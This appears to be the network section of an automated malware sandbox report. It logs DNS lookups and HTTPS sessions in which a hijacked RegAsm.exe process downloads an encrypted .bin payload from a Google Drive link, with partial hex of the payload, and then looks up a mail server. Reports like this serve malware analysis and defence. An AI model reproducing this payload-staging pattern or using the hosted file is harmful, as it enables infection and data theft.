                                              Sep 28, 2021 13:01:36.103693962 CEST53611721.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:36.923989058 CEST5981753192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:36.932432890 CEST53598171.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:36.943465948 CEST5558853192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:36.952140093 CEST53555881.1.1.1192.168.11.20
                                              Sep 28, 2021 13:01:38.007601023 CEST6239853192.168.11.201.1.1.1
                                              Sep 28, 2021 13:01:38.016793966 CEST53623981.1.1.1192.168.11.20
                                              Sep 28, 2021 13:02:13.257863998 CEST5776453192.168.11.201.1.1.1
                                              Sep 28, 2021 13:02:13.266354084 CEST53577641.1.1.1192.168.11.20
                                              Sep 28, 2021 13:02:14.166940928 CEST5949753192.168.11.201.1.1.1
                                              Sep 28, 2021 13:02:14.198234081 CEST53594971.1.1.1192.168.11.20
                                              Sep 28, 2021 13:02:29.176237106 CEST5934753192.168.11.201.1.1.1
                                              Sep 28, 2021 13:02:29.184748888 CEST53593471.1.1.1192.168.11.20
                                              Sep 28, 2021 13:02:36.484287977 CEST6134153192.168.11.201.1.1.1
                                              Sep 28, 2021 13:02:36.492734909 CEST53613411.1.1.1192.168.11.20
                                              Sep 28, 2021 13:02:36.653369904 CEST5734153192.168.11.201.1.1.1
                                              Sep 28, 2021 13:02:36.661535978 CEST53573411.1.1.1192.168.11.20
                                              Sep 28, 2021 13:02:37.248641968 CEST5150953192.168.11.201.1.1.1
                                              Sep 28, 2021 13:02:37.257642031 CEST53515091.1.1.1192.168.11.20
                                              Sep 28, 2021 13:02:38.673310041 CEST6470953192.168.11.201.1.1.1
                                              Sep 28, 2021 13:02:38.681657076 CEST53647091.1.1.1192.168.11.20
                                              Sep 28, 2021 13:03:39.602547884 CEST5885053192.168.11.201.1.1.1
                                              Sep 28, 2021 13:03:39.611356974 CEST53588501.1.1.1192.168.11.20
                                              Sep 28, 2021 13:03:50.096003056 CEST6004853192.168.11.201.1.1.1
                                              Sep 28, 2021 13:03:50.133709908 CEST53600481.1.1.1192.168.11.20
                                              Sep 28, 2021 13:04:34.231743097 CEST5386153192.168.11.201.1.1.1
                                              Sep 28, 2021 13:04:34.240674973 CEST53538611.1.1.1192.168.11.20
                                              Sep 28, 2021 13:05:04.240026951 CEST5402853192.168.11.201.1.1.1
                                              Sep 28, 2021 13:05:04.248840094 CEST53540281.1.1.1192.168.11.20
                                              Sep 28, 2021 13:05:08.756127119 CEST6357453192.168.11.201.1.1.1
                                              Sep 28, 2021 13:05:08.764718056 CEST53635741.1.1.1192.168.11.20
                                              Sep 28, 2021 13:08:34.302956104 CEST5879253192.168.11.201.1.1.1
                                              Sep 28, 2021 13:08:34.311642885 CEST53587921.1.1.1192.168.11.20
                                              Sep 28, 2021 13:09:34.320866108 CEST6342253192.168.11.201.1.1.1
                                              Sep 28, 2021 13:09:34.329977989 CEST53634221.1.1.1192.168.11.20
                                              Sep 28, 2021 13:09:36.030193090 CEST4938753192.168.11.201.1.1.1
                                              Sep 28, 2021 13:09:36.039073944 CEST53493871.1.1.1192.168.11.20

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Sep 28, 2021 13:02:13.257863998 CEST192.168.11.201.1.1.10x3ff1Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                              Sep 28, 2021 13:02:14.166940928 CEST192.168.11.201.1.1.10xc78aStandard query (0)doc-0o-50-docs.googleusercontent.comA (IP address)IN (0x0001)
                                              Sep 28, 2021 13:03:50.096003056 CEST192.168.11.201.1.1.10x71d7Standard query (0)mail.reyesyasociados.comA (IP address)IN (0x0001)
                                              Sep 28, 2021 13:05:08.756127119 CEST192.168.11.201.1.1.10x5ee8Standard query (0)spclient.wg.spotify.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Sep 28, 2021 13:01:25.651279926 CEST1.1.1.1192.168.11.200x7ea0No error (0)devcenterapi.azure-api.netapimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                              Sep 28, 2021 13:01:25.651279926 CEST1.1.1.1192.168.11.200x7ea0No error (0)devcenterapi-eastus-01.regional.azure-api.netapimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.netCNAME (Canonical name)IN (0x0001)
                                              Sep 28, 2021 13:02:13.266354084 CEST1.1.1.1192.168.11.200x3ff1No error (0)drive.google.com142.250.185.174A (IP address)IN (0x0001)
                                              Sep 28, 2021 13:02:14.198234081 CEST1.1.1.1192.168.11.200xc78aNo error (0)doc-0o-50-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                              Sep 28, 2021 13:02:14.198234081 CEST1.1.1.1192.168.11.200xc78aNo error (0)googlehosted.l.googleusercontent.com142.250.185.193A (IP address)IN (0x0001)
                                              Sep 28, 2021 13:03:50.133709908 CEST1.1.1.1192.168.11.200x71d7No error (0)mail.reyesyasociados.com109.169.39.245A (IP address)IN (0x0001)
                                              Sep 28, 2021 13:05:08.764718056 CEST1.1.1.1192.168.11.200x5ee8No error (0)spclient.wg.spotify.comedge-web.dual-gslb.spotify.comCNAME (Canonical name)IN (0x0001)
                                              Sep 28, 2021 13:05:08.764718056 CEST1.1.1.1192.168.11.200x5ee8No error (0)edge-web.dual-gslb.spotify.com35.186.224.25A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • drive.google.com
                                              • doc-0o-50-docs.googleusercontent.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.11.2049726142.250.185.174443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampkBytes transferredDirectionData
                                              2021-09-28 11:02:13 UTC0OUTGET /uc?export=download&id=13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8g HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: drive.google.com
                                              Cache-Control: no-cache
                                              2021-09-28 11:02:14 UTC0INHTTP/1.1 302 Moved Temporarily
                                              Content-Type: text/html; charset=UTF-8
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Tue, 28 Sep 2021 11:02:14 GMT
                                              Location: https://doc-0o-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/hfb1eo2pc77l1m3ao72uchj4vo9g7ss2/1632826875000/00519186742208262786/*/13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8g?e=download
                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                              Content-Security-Policy: script-src 'nonce-QCgFv8DyA2A4PqmHbI8pjw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              Server: GSE
                                              Set-Cookie: NID=511=mGGGkcXz0fNVXVR_KdpLyIuj-tqq8El5Z1GmAFlGCPPril7KbVbUwCjMrnIiZ99mZalbVJzFHe7moVhyvOAqMz2ujxeWFaD7TaUuK8ysdjycC8QPomSsmEwxRhFZ0gtMwfCgyXS1ftJ6egHE1O-lO8krAl71vHYS6fsjFmqJr3o; expires=Wed, 30-Mar-2022 11:02:13 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2021-09-28 11:02:14 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6f 2d 35 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 68 66 62 31
                                              Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0o-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/hfb1
                                              2021-09-28 11:02:14 UTC1INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.11.2049727142.250.185.193443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampkBytes transferredDirectionData
                                              2021-09-28 11:02:14 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/hfb1eo2pc77l1m3ao72uchj4vo9g7ss2/1632826875000/00519186742208262786/*/13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8g?e=download HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Cache-Control: no-cache
                                              Host: doc-0o-50-docs.googleusercontent.com
                                              Connection: Keep-Alive
                                              2021-09-28 11:02:14 UTC2INHTTP/1.1 200 OK
                                              X-GUploader-UploadID: ADPycdtz_TNHQJeZP5jQw_ki4CIk5UWTBp5vYQZvUrS9UrbRfW5ODp7ETx5rboBPfAv2G_N3qgf5NXohmHOtx1V-yGA
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                              Access-Control-Allow-Methods: GET,OPTIONS
                                              Content-Type: application/octet-stream
                                              Content-Disposition: attachment;filename="wuh_mWzUJP244.bin";filename*=UTF-8''wuh_mWzUJP244.bin
                                              Date: Tue, 28 Sep 2021 11:02:14 GMT
                                              Expires: Tue, 28 Sep 2021 11:02:14 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=Fhd/fg==
                                              Content-Length: 221760
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                              Connection: close
                                              2021-09-28 11:02:14 UTC5INData Raw: 62 be 1f c8 23 7c 08 26 32 65 79 c9 76 98 bd b4 12 ec ae 2a ff c2 c7 04 2d c4 4b 8f a7 f1 2f 6c 85 d9 75 b4 0f b1 ef dc c6 71 bf 7a 16 63 17 23 38 af ba 9f 08 a2 60 79 47 2b b6 d9 62 e3 f8 ca be 22 1d 58 98 01 ca 81 0b d1 1b df 3d 45 6d b7 20 78 ca a0 5d 22 f1 89 aa 1e 3f e9 56 0c e8 a5 c0 e1 8a aa 5d 6a 66 d0 2f 76 ca a3 de d3 a7 39 2a 08 92 36 48 ca 7f 40 be ad dc 6a c4 41 54 de d9 b1 56 9f 30 fe f7 59 d0 1a 66 1f 69 5b df 4f 4c 9e 3d 32 e7 5e 6b bb cf db 00 a8 ee f9 5a 91 bc 3e d8 df d0 fd a1 52 64 c1 34 76 26 98 42 40 99 d1 75 cf a6 e5 22 b8 db bd 91 e2 ec bf eb 50 af bb eb 4a e3 70 b8 9e e0 77 d7 ad 0d e9 e3 06 5e 5f 00 2f 9b 8c 52 24 07 41 ec 2b f2 24 2d 80 23 8f 58 62 ea 27 90 1f 8b 01 07 f6 e8 eb 6f 9a 78 dd 20 e8 c0 e0 71 c4 2d 96 1b 13 4c 46 35
                                              Data Ascii: b#|&2eyv*-K/luqzc#8`yG+b"X=Em x]"?V]jf/v9*6H@jATV0Yfi[OL=2^kZ>Rd4v&B@u"PJpw^_/R$A+$-#Xb'ox q-LF5
                                              2021-09-28 11:02:14 UTC9INData Raw: dd bf 39 ba 9b 94 f2 f9 ff 92 62 f2 04 c5 b7 07 66 e0 b3 6e 7a 91 7a bb cc e0 4e d5 36 29 34 3b 9e 54 f2 2b 77 f2 a7 bd bf df ad 9d fa 5c f2 35 f6 f4 c9 c1 a0 91 ae cd e5 2a 97 2e 4f 6f 67 e1 86 c3 70 b1 0a 0f 24 e9 ed 9a 53 80 00 75 05 4e 20 58 3a 34 d1 71 dd 0d a6 00 af 74 ab 49 53 16 5a a1 4d 74 11 93 a7 3d 0f a5 8f d2 2b 56 e7 94 31 7b 83 36 79 1b d1 8c 2d 7b 0f 32 c5 e9 2b ad 4a 8b 8e 54 13 e6 17 91 28 92 a4 cc 9e 99 f9 f8 71 93 8c e1 69 2b 8b 74 32 a2 b5 17 d9 3e 95 19 13 04 3f 6a a4 a6 e4 d8 e4 1f 47 68 75 04 c5 c1 f6 78 e4 bb 67 ac 79 a3 7e ea 20 b7 0f eb fe 43 00 8a 59 4b 8a a3 23 88 2d b6 06 0f d3 e2 b9 cb 0a 95 1b 33 d7 d3 ce 1b b9 06 fb ee 86 b7 bc ee f9 ff 52 3e 34 2e 7f f7 92 95 f5 3d 23 a2 8a 91 07 74 22 98 44 ab 9f 8d c4 33 41 58 91 43 1d
                                              Data Ascii: 9bfnzzN6)4;T+w\5*.Oogp$SuN X:4qtISZMt=+V1{6y-{2+JT(qi+t2>?jGhuxgy~ CYK#-3R>4.=#t"D3AXC
                                              2021-09-28 11:02:14 UTC12INData Raw: 6c 89 36 e2 46 48 34 ef b4 62 80 cd 14 5f 3a a8 e0 97 3c 8a f8 14 2f f0 b0 73 61 48 d2 d6 db d0 66 a9 d4 50 7c 65 7b 7b b4 02 bd 98 83 fd 04 a9 1a 7b 30 85 60 17 26 54 ea b9 a3 35 9f eb 91 8f f8 c1 20 94 95 76 70 e5 a0 83 94 cc 28 63 38 da b8 8d fe 62 4f e9 c6 e2 8f 86 8f 09 8a b4 be 40 42 f0 b9 82 68 34 20 ff d2 27 85 e1 86 da 5a 79 50 a2 a0 46 df 8d 8b 94 30 1c 8b 8c 6a 1b 69 4b 96 82 6a bf 29 cc 3f bf a7 3c 77 4c 31 cb ca 2e 43 db 9a 78 71 bd 88 15 dd 71 46 9f 40 2e ff d0 0b 5e 49 84 bf fd e0 c6 f2 c4 e8 eb 62 99 5a 15 4f 75 9c a2 bd 17 1c 14 63 27 e7 ad 5d 0f aa 0c f0 43 52 c6 31 b2 6c 76 5a 1d b5 d4 54 34 1f 28 1f 7b 85 d2 25 b5 72 4c ff 1f fc 6d 63 53 82 c2 0c af 4c e2 6d bc bb b7 b0 75 17 de 14 03 a2 1f e5 b1 8c a8 b0 75 30 f0 7d c5 97 b0 e0 09 9f
                                              Data Ascii: l6FH4b_:</saHfP|e{{{0`&T5 vp(c8bO@Bh4 'ZyPF0jiKj)?<wL1.CxqqF@.^IbZOuc']CR1lvZT4({%rLmcSLmuu0}
                                              2021-09-28 11:02:14 UTC16INData Raw: 9a 77 3b fb 50 4e 58 9b 07 a5 47 0f d1 11 01 cd 9f 45 80 98 78 c0 b3 41 0a c9 89 ea 14 e1 e9 47 04 c0 2a c1 e1 8c de 53 6a 66 cb 40 b0 ca a3 d4 0d a8 1c 02 3f 92 36 42 d9 62 68 86 ad dc 60 9a 41 45 d6 ff 48 ec 91 36 25 38 94 f1 a8 b9 5c 81 52 bc 27 25 e7 0e 5c bd 09 0c c9 a4 68 20 da 87 bf 22 ff c8 18 d5 7c f0 8f de e2 48 80 6d 56 62 dd 39 58 f4 be 1b 74 88 f9 27 9a 42 bd 91 e4 83 79 eb 50 f5 20 e4 6f 87 46 bb 9e 75 7d f3 e4 35 e9 e3 0c 80 5f 11 27 53 32 50 25 0a 2f 21 2b f2 76 f0 8f 06 af 6f 62 ea 2d 83 3f ed 4f 04 f6 e2 15 6f 8b 70 f5 e6 e8 c0 e6 5e 02 2d b6 11 cd 43 61 1d ed ff de ee ef 2e 25 d0 59 ab b5 41 2b f7 09 8d d5 e9 dd ac 36 f3 9e 76 71 79 29 a0 da b2 c2 6d 71 28 dc 7d 9e af 0d 3f 32 f3 e7 18 92 26 be bb ff ee bb 3e 7d 06 c5 b0 24 46 c8 f9 64
                                              Data Ascii: w;PNXGExAG*Sjf@?6Bbh`AEH6%8\R'%\h "|HmVb9Xt'ByP oFu}5_'S2P%/!+vob-?Oop^-Ca.%YA+6vqy)mq(}?2&>}$Fd
                                              2021-09-28 11:02:14 UTC18INData Raw: c9 71 0f 2e e4 ed b0 53 80 00 32 7c 4e 20 54 2c 5c ec a3 dd 07 a0 20 0b 4c ab 4f 7a 57 0b a1 4b 11 41 dd a5 37 21 db a5 fc 2d 7e 91 82 02 56 a3 77 2d 1b d7 5b ad 72 7c 67 ed de 21 be 44 8e 99 3c 6d de 17 9b 31 49 cb b7 9a 47 c9 f5 44 a6 f3 a6 a9 2b 8b 74 c6 54 bf 1f f3 29 9a 19 96 04 3f 6a 50 aa ca da ee 76 d5 b6 67 26 8c d6 f6 72 c8 bd 20 ae 7f af 7e 85 22 b7 03 5a 86 45 2a 80 71 11 89 8b 25 a0 56 b6 7f 05 d6 2f ab 83 22 ce 19 33 d3 fb ed 1b fb 97 d3 82 84 b7 ba c6 85 ff 52 34 b1 43 7d e5 8e bd dc 3c 38 94 a7 fb 12 75 24 b0 2b ab 9f 9a 18 14 20 6f 91 49 63 dc 6a 09 f5 1b 91 7e 92 ad ae 10 d7 22 6a 70 c4 48 4b 68 15 aa 27 94 33 0e 6b 89 0d 1e cc dd 3f c2 9e 06 0f e4 6c eb 71 6e 7b 80 23 c0 02 4e 34 e9 9a 2a 1a cd 1e 7d 6f c9 e0 91 10 39 e2 75 e8 f4 b0 68
                                              Data Ascii: q.S2|N T,\ LOzWKA7!-~Vw-[r|g!D<m1IGD+tT)?jPvg&r ~"ZE*q%V/"3R4C}<8u$+ oIcj~"jpHKh'3k?lqn{#N4*}o9uh
                                              2021-09-28 11:02:14 UTC19INData Raw: 76 bb 8f b0 fa 0d b7 84 a8 30 94 4b 0c a8 41 d0 e1 18 77 06 d5 9f 13 5d 89 97 c8 ac 2b f7 96 1d 0f 6f 2b 2f 1f 5a e6 58 b9 8c 54 6c a5 36 21 02 4b 77 2a f3 62 8d 58 9a 01 ca 81 0f 8e 11 df c2 b4 6d b7 98 15 c0 a0 5d 2d f1 89 ea 04 3f e9 57 0c e8 a5 c0 9d 80 aa 5d 64 66 d0 2f fc c0 a3 de dc a7 39 2a 12 92 36 49 ca 7f 40 be 34 d6 6a 44 4f 54 de d7 09 e6 91 30 46 fe 94 f1 b8 67 53 a5 7a 8b 27 25 5e 17 42 95 3f 0c c9 ae 77 2a cb 8f 98 34 fe c8 04 ba ba f1 8f d4 3c 44 5c 50 56 62 a4 10 60 f4 d9 1d aa 88 e7 2f b2 ff a7 91 e2 ed bd eb 50 ff 23 e1 4a af d6 ba 9e 7f ea e0 cc 0d e7 e3 06 5e 5f 00 2f 7b 8c 50 25 0c ec eb 2b f2 54 2e 80 23 53 54 62 ea 32 90 1f c5 6d 04 f6 e9 cb 6f 9a 78 29 2c e8 c0 6d 31 c4 2d 37 16 13 4c 4b 35 da ff c4 e4 fc 0e 0d e8 59 ab 27 92 2b
                                              Data Ascii: v0KAw]+o+/ZXTl6!Kw*bXm]-?W]df/9*6I@4jDOT0FgSz'%^B?w*4<D\PVb`/P#J^_/{P%+T.#STb2mox),m1-7LK5Y'+
                                              2021-09-28 11:02:14 UTC20INData Raw: 5d 55 75 8a 0f 8a 04 b3 47 74 3a 92 46 c9 1d 43 17 3b dc 5d 20 24 8d 62 04 1b 90 9d a7 de fd ff d5 3c 99 83 57 e5 88 84 dd e5 3a 92 89 9b 63 ab 23 98 57 b8 98 e2 dc 1b 08 5c bd 18 78 cf 07 15 dd 23 95 11 78 72 ae 02 d2 db 15 00 df 48 4f 7a 30 7a 3d dc 74 3c 7a 88 4a 3c cf dd 3f c2 9c 06 3f e5 6c e7 48 a2 53 5a 2b e8 68 5d 33 94 95 0c 1a c9 3c 8e 57 c9 e6 bf 11 28 e7 10 53 16 b1 62 63 d2 37 d7 f7 cc 7e b9 93 f6 7d 65 77 68 af 8d 80 f6 81 fc 11 91 71 6b 26 8d ea fd 35 50 e0 0a b6 3a 9d 13 32 b2 e3 d0 76 fb 95 76 7e 4c ae 85 9e ce 8a 63 2c dd 6e f5 d2 69 4c e0 e1 d5 80 f8 90 ab 94 a3 92 3a 53 f4 ac 31 87 25 17 f4 79 29 9b 83 e0 cd 5a 7d f6 1f a3 45 c6 8b 38 81 3f 16 76 2f 57 06 48 2f 87 fc 78 b3 2f bb e1 a0 b2 29 60 4a 08 13 d7 3e bb cb b0 7e 17 22 85 02 f3
                                              Data Ascii: ]UuGt:FC;] $b<W:c#W\x#xrHOz0z=t<zJ<??lHSZ+h]3<W(Sbc7~}ewhqk&5P:2vv~Lc,niL:S1%y)Z}E8?v/WH/x/)`J>~"
                                              2021-09-28 11:02:14 UTC22INData Raw: a0 5a 8b 23 25 ed 90 39 95 31 0d c4 7e ca 20 cb 8e bf 20 fe c8 14 92 ba f1 8f de 35 ca 1f 82 ee 71 d2 07 6b e5 ba 7e ab 89 e8 25 bb ee b8 83 e3 c4 fe eb 50 f9 d8 ec 3c c3 a1 c7 9e 7f 6f c4 d8 0d e9 e9 2e 5e 5e 00 25 17 d7 78 b4 0c 40 ed 9c e1 7a 38 91 25 94 51 71 ed 0c ab 3f c5 73 04 f6 9b c9 6e 9a 72 ce 28 f9 c4 8f 30 c5 2d bc 12 02 4b d1 5b f2 fc df e4 f6 1e 05 f9 51 c4 bb 9e 2b d5 98 cd d5 ef f3 42 27 fb fb 8c cb 7b 23 ac da ae c2 6d 71 e5 f6 7d bc 96 58 0e 8d dd cc 3b ba 97 62 bb ed d5 9e 3c c1 05 d5 b6 0c 61 c8 f9 6e 6c 8d 15 41 d6 e0 44 d3 3a 76 7c 3b 0e 5e f5 0b 4c d5 a7 ac f8 bc af 9d f6 50 9b 78 b8 f4 cd e3 58 8e 9c a8 c5 47 97 24 42 4b 55 c1 86 c5 1b c9 4c 0f 2e e8 ed d2 50 80 0c 75 52 4f 20 58 30 52 97 8f dc 11 54 09 d2 66 85 4b 52 7f 1f 89 63
                                              Data Ascii: Z#%91~ 5qk~%P<o.^^%x@z8%Qq?snr(0-K[Q+B'{#mq}X;b<anlAD:v|;^LPxXG$BKUL.PuRO X0RTfKRc
                                              2021-09-28 11:02:14 UTC23INData Raw: 62 61 dc 9b c1 c6 e4 47 f4 fc 29 7a 48 74 aa f5 07 95 f6 aa e3 7c a2 60 7b 34 97 f1 1a 4b 75 ea a8 a3 a4 3d 03 a1 af db 83 08 ef 93 5b 7f 33 8c 92 87 c8 00 3b 3c c7 40 8e cc 29 ad f3 ee c7 f1 8b 85 ab 90 8f 55 42 53 f2 8e d3 96 35 06 c1 c2 46 83 9f 9e de 72 8d f0 bd b4 7d ff 8d 9a 9a af 00 75 8d 42 cb 9d 52 87 fc 0c b7 29 c8 99 88 9c 2d 73 4a 36 e7 fb 3e bd d0 a0 4d de a2 85 02 8b 59 46 9f 42 f2 e8 c1 18 5e 26 5c bb e2 f8 46 db e8 e5 e6 12 5f 72 66 47 af e4 28 a2 04 0b 7f aa 36 e3 b8 24 1e ab 20 f4 43 67 c6 31 b2 43 f7 74 1d b5 c1 55 09 74 56 06 7f 9a d8 a5 bc 5e 41 f2 6f 3e 13 7b 59 9f 1c c1 b8 42 f1 63 b6 ac 9b 5e 60 e9 d9 2e 31 8b 37 91 b9 9a 50 cf 7f ce f1 07 b3 8f b0 e4 73 bf 85 a8 34 fb 82 29 a2 4b ca 35 77 7f 07 e6 9f 6d 45 86 97 cc ba 19 d9 96 1c
                                              Data Ascii: baG)zHt|`{4Ku=[3;<@)UBS5Fr}uBR)-sJ6>MYFB^&\F_rfG(6$ Cg1CtUtV^Ao>{YBc^`.17Ps4)K5wmE
                                              2021-09-28 11:02:14 UTC24INData Raw: 2a df ba e0 de ee f5 6e 1e f7 94 5e cd 14 20 a7 f2 9c ad 67 7a 3b f3 7a 45 86 0e 3d 2d e7 0a 3a ac 63 bd e4 fb df 3c 16 c1 04 3b b7 1a 9f c9 a6 6c 5a 3e 15 f0 cc 1e 45 c4 df 47 27 17 f4 5c 79 74 67 d5 a6 d2 dc 93 ad 97 9f 5c e4 5a b2 dc d9 c8 a7 88 f3 3f aa 2a 9d 08 5d 45 a7 9c 86 c5 1e 8e 06 0e 2e e4 45 f0 51 80 02 c7 8b 4f 20 52 43 53 83 71 d9 2f bb 0b db 48 83 6d 52 79 03 21 45 7e 39 d9 db 35 09 b3 a3 fe a7 29 ed 82 03 33 87 58 2d 11 f9 a2 20 72 76 e7 cd e9 21 ba 5a 1a ad 3b 45 e2 ca 3d 3a 97 b5 cb 2c 6f 84 f1 5d 93 ad 6d 3c 2b 8d 68 c6 52 bf 1f ff 2e ae 6f 3a 0c 3f 60 7c a6 2e d8 e4 1f 65 92 67 2c f8 41 fe 72 cc 91 5d c4 7e a9 56 d0 98 9f 48 35 fe 43 02 6f 5b 4b 8d 9d 0b a6 2f b6 75 19 f6 74 c7 c9 0a 95 1f 1b 33 d1 97 1d d3 b9 fb e4 8c 37 b4 ee f9 fb
                                              Data Ascii: *n^ gz;zE=-:c<;lZ>EG'\ytg\Z?*]E.EQO RCSq/HmRy!E~95)3X- rv!Z;E=:,o]m<+hR.o:?`|.eg,Ar]~VH5Co[K/ut37
